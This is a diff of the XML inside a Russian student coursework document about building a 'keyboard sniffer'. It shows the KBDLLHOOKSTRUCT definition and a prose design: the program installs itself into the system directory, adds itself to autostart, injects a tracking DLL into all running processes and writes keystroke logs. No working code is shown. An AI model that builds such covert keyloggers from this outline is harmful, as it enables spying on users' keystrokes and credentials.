+        <w:t>устанавливает</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:sz w:val="28"/>
@@ -7472,441 +4855,163 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>struct</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> {</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">DWORD  </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>vkCode</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">DWORD  </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>scanCode</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>DWORD  flags</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>DWORD  time</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    ULONG_</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">PTR  </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>код</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>виртуальной</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>клавиши</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Код должен быть значением в диапазоне 1 - 254.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>scanCode устанавливает аппаратный код опроса</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> клавиатуры (скэн-код) клавиши.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>f</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>lags устанавливает флажок дополнительной клавиши, флажок события ввода, контекстный код и флажок переходного состояния.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>t</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ime у</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>станавливает отмет</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ку времени для этого сообщения.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
         </w:rPr>
         <w:t>dwExtraInfo</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>} KBDLLHOOKSTRUCT, *PKBDLLHOOKSTRUCT;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>vkCode</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> у</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>станавливает код виртуальной клавиши. Код должен быть значением в диапазоне 1 - 254.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>scanCode</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> у</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>станавливает аппаратный код опроса</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> клавиатуры (скэн-код) клавиши.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>f</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>lags</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> у</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>станавливает флажок дополнительной клавиши, флажок события ввода, контекстный код и флажок переходного состояния.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>t</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>ime</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> у</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>станавливает отмет</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>ку времени для этого сообщения.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>dwExtraInfo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="28"/>
@@ -9178,6 +6283,7 @@
   <w:style w:type="character" w:default="1" w:styleId="a0">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="a1">
@@ -9752,7 +6858,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{9B2B2808-9A74-4ABF-9D36-FD154793B96C}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{5894DB58-3E9F-4B8B-ADE5-E56A91755735}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/Курсовая_Работа_Клавиатурный_Сниффер .docx
+++ b/Курсовая_Работа_Клавиатурный_Сниффер .docx
@@ -1098,16 +1098,6 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:ind w:firstLine="540"/>
-        <w:rPr>
-          <w:b/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:pStyle w:val="1"/>
         <w:jc w:val="center"/>
         <w:rPr>
@@ -1121,6 +1111,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Введение</w:t>
       </w:r>
       <w:bookmarkEnd w:id="0"/>
@@ -2361,57 +2352,133 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ae"/>
         <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Данный проект включает в себя непосредственно два модуля</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> модуль для установки и инжекции динамической библиотеки в </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>explorer</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>exe</w:t>
+        <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Данный проект включает в себя непосредственно два модуля: модуль для установки и инж</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>екции динамической библиотеки</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> и сама динамическая библиотека. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>4</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>.1 Способ взаимодействия пользователя и программы.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Для взаимодействия пользователя с программой был разработан интуитивно понятный интерфейс лог-файлов.   </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Рассмотрим взаимодействия пользователя с программой. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Для запуска </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">и установки </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">программы </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>требуется запустить исполняющий файл программы от имени администратора. Программа автоматически установится на компьютер и запустится, начав писать лог-файлы.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> После чего работа с программой сводится к анализу лог-файлов.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2420,20 +2487,265 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">и сама динамическая библиотека. Динамическая библиотека содержит в себе сам обработчик событий клавиатуры и модуль работы с </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>log</w:t>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>4.2 Структурная схема программы</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="426"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Работу программы можно разделить на бло</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ки, которые будут описаны далее.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="426"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>4.2.1 Исполня</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>емый файл</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">4.2.1.1 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Блок установки программы</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Для установки программы исполняемый файл и рядом лежащая библиотек копируется из текущей директории в директорию операционной системы. И исполняемый файл заносится в автозагрузку.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>4</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">.2.1.2 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Блок инжекции библиотеки</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>В момент выполнения программы создаетс</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>я снимок всех текущих процессов. После чего во все процессы производится инжекция отслеживающей библиотеки.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b/>
